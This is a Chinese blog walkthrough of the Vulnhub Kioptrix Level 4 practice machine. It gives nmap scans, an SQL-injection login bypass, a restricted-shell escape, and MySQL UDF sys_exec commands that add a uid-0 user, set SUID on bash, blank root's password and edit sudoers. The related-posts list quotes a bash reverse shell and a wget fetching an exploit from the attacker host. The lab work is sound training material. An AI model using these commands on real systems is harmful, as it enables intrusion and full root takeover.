Vulnhub-Kioptrix Level 4 打靶

已于 2024-12-10 19:58:20 修改
阅读量848 收藏 6
点赞数 29
CC 4.0 BY-SA版权
分类专栏: vulnhub靶机 文章标签: 服务器 linux 网络安全 系统安全 web安全 mysql
于 2024-12-10 19:45:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/a2FpX2tr/article/details/144378494

目录

一、nmap扫描

二、sql万能密码,进入后台拿到密码登录ssh

三、MySQL UDF提权

四、补充

在靶机未打开和开启时分别arp-scan -l,判断那个IP为靶机IP,发现靶机IP为192.168.213.136

一、nmap扫描

#扫描tcp开放了那些端口,保存到ports中

nmap -sT --min-rate 10000 -p-192.168.213.136 -oA nmapscan/port   

#扫描udp开放了那些端口,保存到udp中

nmap -sU --min-rate 10000 192.168.213.136 -oA nmapscan/udp

#对开放的端口进行详细的探测服务版本,保存到detail中

nmap -sT -sC -v -sV -O -Pn -p22,80,139,137,445 192.168.213.136 -oA nmapscan/detail

#使用nmap进行漏洞脚本探测

nmap --script=vuln -p22,80,111,139,443,1024 192.168.213.136 -oA nmapscan/vuln

总结:通过nmap扫描端口,得知了端口开放情况,端口服务的版本,和漏洞的情况

漏洞扫描在web中只扫到一个dos漏洞,并且139,445没有扫描到漏洞,22端口的ssh是打算往后考虑的,在80发现/database.sql  所以先看看web有什么突破口了。

二、sql万能密码,进入后台拿到密码登录ssh

打开就是一个登录界面,这时候就想到三个突破点

1.弱口令

2.cms历史漏洞

3.sql万能密码

先看看那个/database.sql

使用john作为用户名,1234作为密码看看能不能登录

结果是不行的,那就按三个突破口一个个的来试。

手动测试了几个弱密码,都登录不进去

searchsploit LigGoat 没有结果看来也不是cms

那就最后试试sql万能密码了

admin' or 1=1# 

对密码框也试试

 爆了不一样的错,想到之前暴露出的database.sql的john这个用户名

用户名:john

密码:admin' or 1=1#

进入了这个页面,写着用户名和密码,并且22ssh是开启的,进行ssh登录

ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 john@192.168.213.136

成功登录,但是发现只能执行几个命令,进行shell逃逸

echo os.system('/bin/bash')

这样就可以运行任意的命令了

三、MySQL UDF提权

内核提权发现没有gcc ,先放弃看看别的

sudo -l 需要密码,sudo提权放弃

cat /etc/crontab 发现也没有定时任务

siud提权到GTFOBins里也没有找到可以利用的

那只好看看配件文件,history泄露了什么有用的东西了

cd /var/www    #因为nmap扫描知道了是apache,所以web默认站点目录是这个

cat checklogin.php

mysql登录:mysql -u root -p   进入mysql

SELECT VERSION();  #发现是5.0.X的版本

SHOW GRANTS FOR CURRENT_USER();

显示有 ALL PRIVILEGES,权限够,能进行UDF提权

直接创建新用户并赋予root权限

SELECT sys_exec('useradd -ou 0 -g 0 hacker');
SELECT sys_exec('echo "hacker:password" | chpasswd');

su hacker 输入密码登录

id 显示为root权限,提权成功

四、补充

UDF提权不止有创建新用户并赋予root权限,下面还有几种方法供大家选择:

1. 设置 SUID 位
通过设置 SUID 位,允许普通用户以 root 权限运行某些程序,
例如 /bin/bash:

SELECT sys_exec('chmod u+s /bin/bash');

2.将用户 john 添加到 sudo 组:
 

SELECT sys_exec('/usr/sbin/usermod -aG sudo john');

3.修改系统登录文件(如 /etc/passwd):
将 root 用户的密码直接移除:
 

SELECT sys_exec("sed -i 's/^root:.*/root::0:0:root:\/root:\/bin\/bash/' /etc/passwd");

4.修改 /etc/sudoers 文件
直接修改 sudoers 文件,授予用户以 root 权限执行任意命令:

SELECT sys_exec('echo "john ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers');

5.创建新用户并赋予root权限

SELECT sys_exec('useradd -ou 0 -g 0 hacker');
SELECT sys_exec('echo "hacker:password" | chpasswd');
vulnhub-Kioptrix4靶机的测试报告
ccc_9wy的博客
10-22 816
基于渗透测试流程测试kioptrix4靶机;dirsearch目录扫描;sql注入;万能密码漏洞;UDF提权;mysql无密码登录;LinEnum.sh渗透测试报告。
Vulnhub-Kioptrix Level 2 打靶
a2FpX2tr的博客
12-07 1879
现在功能正常了 nc监听并构造payload反弹shell:127.0.0.1 && /bin/bash -c 'bash -i >& /dev/tcp/192.168.213.128/443 0>&1'nmap -sn 192.168.213.0/24 #在靶机打开时和未打开时使用这条命令,判断那个IP为靶机。apache 2.0.52有 dos漏洞,也探测出有csrf漏洞,没法getshell,放弃。是一个登录界面,先f12看一下,会不会泄露出是什么cms或发现其他的敏感信息。
Vulnhub-Kioptrix Level 3 打靶方法一
a2FpX2tr的博客
12-08 1450
arp-scan -l 主机发现,确定192.168.213.134靶机
Vulnhub-Kioptrix Level 3 打靶方法二
a2FpX2tr的博客
12-09 437
Vulnhub-Kioptrix Level 3 打靶方法一-优快云博客。
Vulnhub Kioptrix Level 1打靶
a2FpX2tr的博客
12-06 522
searchsploit apache mod_ssl 发现能利用的exploit, 远程缓冲区溢出,能拿到shell。发现apache版本为1.3.20,打开网页使用Wappalyzer又发现mod_ssl 版本为2.8.4。在 http://github.com/heltonWernik/OpenLuck 找到编译利用的方法。在靶机上wget http://192.168.213.132:8888/ptrace-kmod.c。#对开放的端口进行详细的探测服务版本,保存到detail中。
Kioptrix Level 4靶场超详细讲解!&mysql udf提权具体如何操作&小白都能看懂!详细到家了!&Kioptrix Level 4靶场的安装
jockerboss的博客
02-28 1237
Kioptrix Level 4靶场超详细讲解!mysql udf提权具体如何操作 小白都能看懂!详细到家了!巨详细的过程以及参数详解!
红队打靶KIOPTRIX1.2打靶思路详解(vulnhub
Bossfrank的博客
07-19 1655
本文是vulnhub靶机KIOPTRIX1.2的详细打靶过程。涉及到的知识点包括cms漏洞利用、敏感信息搜索、john破解密码哈希、sudoers文件提权等。CMS漏洞利用获得反弹shell是关键。敏感信息搜索需要有耐心。
Vulhub靶机合集
Aiwin的博客
07-21 1607
Vulhub靶机合集(持续记录)
VulnHub Kioptrix Level 4 通过sqlmap --os shell提权 的详细打靶过程及相应代码
10-26
VulnHubKioptrix Level 4是一个常见的渗透测试平台,它模拟了一个Linux服务器环境,挑战玩家通过一系列的安全漏洞进行系统级别的权限提升。在这个级别中,其中一个目标是利用SQL注入漏洞并使用`sqlmap`工具获取...
通过filezilla在局域网下实现高速传输数据
Tipriest的博客
08-02 248
本文介绍了FileZilla的安装与使用方法。Linux系统通过apt安装openssh-server,Windows可参考相关教程。使用部分详细说明了WiFi和有线网络两种连接方式,包括IP设置和连通性测试步骤,并展示了20-40MB/s的传输速度。常见问题解答了不同频段WiFi连接和"connection refused"错误的排查方法,提供了相关技术文章的参考链接。文章配有详细的配置截图,便于用户直观理解操作流程。
linux-系统日志查看指令systemctl
最新发布
guchuanhang的专栏
08-05 321
本文介绍了Linux系统管理中的三个重要工具:systemctl用于管理系统服务,包括启动/停止服务和设置开机自启;journalctl用于查看systemd日志,支持按服务筛选和实时跟踪;以及基本日志查看和端口占用检查方法。文中还讲解了.service文件的存放位置差异,提供了常用命令参考和实用技巧,如查看Nginx进程启动时间、日志关键字搜索等。这些工具和技巧能有效帮助管理员进行日常系统维护和故障排查。
宝塔服务器挂载数据盘
ysy1119的博客
08-01 543
打包项目:mvn clean package -DskipTests。测试文件上传:验证文件是否正确存储到 /data/xxx-files。启动应用:java -jar campus-backend.jar。权限正确:目录权限设置正确,应用可以正常读写。自动挂载:重启后自动挂载,无需手动操作。上传到服务器:将jar包上传到服务器。独立存储:文件存储在独立的数据盘上。容量充足:可用空间足够存储大量文件。性能优化:不影响系统盘性能。
Linux选择
m0_74726609的博客
08-01 825
D. systemctl service: service 不是 systemctl 的一级子命令,但 systemctl 可以管理 .service 单元,例如 systemctl start my.service。在systemd中,运行级别的概念被目标(target)单元取代,但类似的逻辑适用:halt.target 对应运行级别0,reboot.target 对应运行级别6。B. ps -a root: -a 选项用于显示所有与终端相关的进程(除了会话领导者和没有控制终端的进程)。
Linux->进程间通信
shylyly_的博客
08-03 632
Linux->进程间通信的全方位讲解和演示
【紧急预警】NVIDIA Triton推理服务器漏洞链可导致RCE!
athink_cn的博客
08-05 478
NVIDIA 的 Triton 推理服务器中存在一系列严重漏洞,这是一个用于大规模运行 AI 模型的流行开源平台。当这些缺陷链接在一起时,远程、未经身份验证的攻击者可能会完全控制服务器,从而实现远程代码执行 (RCE)。
手动开发一个TCP服务器调试工具(一):基础知识与核心类接口
专注于 Qt/C++ 应用开发和机器视觉领域的开源项目分享。期待与您共同进步!
08-05 750
本文介绍了Qt中TCP网络通信的两个核心类:QTcpServer和QTcpSocket。QTcpServer负责监听端口并处理客户端连接请求,提供listen()、newConnection信号等接口;QTcpSocket实现数据收发,支持connectToHost()、write()、readAll()等方法。文章详细说明了类功能、常用接口、信号机制,并给出了典型通信流程示例,特别强调了多客户端连接管理、socket生命周期处理和线程安全等注意事项。最后预告将基于这些知识开发无界面TCP服务程序。
Java应用服务器选型指南:WebLogic vs. Tomcat、WebSphere、JBoss/Wildfly
weixin_49715102的博客
08-01 723
关于WebLogic你了解多少?它凭什么在企业级Java应用服务器中占有一席之地?这篇分享了WebLogic概念、使用场景、与主流服务器的优势PK等,推荐给做Java开发的小伙伴们。
网站建设服务器从入门到上手
lorfu的博客
08-01 924
服务器:数字世界的幕后英雄》摘要 服务器是支撑数字世界的核心基础设施,默默处理海量数据请求,保障网络服务稳定运行。本文系统介绍了服务器类型(Web、应用、数据库、文件、邮件、DNS服务器等)、主流操作系统(开源的Linux和商业化的WindowsServer)及其基础操作指南。Linux部分涵盖文件目录操作、内容查看和系统信息查询命令;WindowsServer部分详解计算机名更改、网络配置、虚拟内存设置等管理操作。文章强调服务器技术学习需要理论与实践结合,建议通过搭建个人服务器环境深化理解,并持续关注技
3. boost::asio之同步读写的客户端和服务器示例
yang_pi_pi的博客
08-01 347
前面我们介绍了boost::asio同步读写的api函数,现在将前面的api串联起来,做一个能跑起来的客户端和服务器。客户端和服务器采用阻塞的同步读写方式完成通信。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值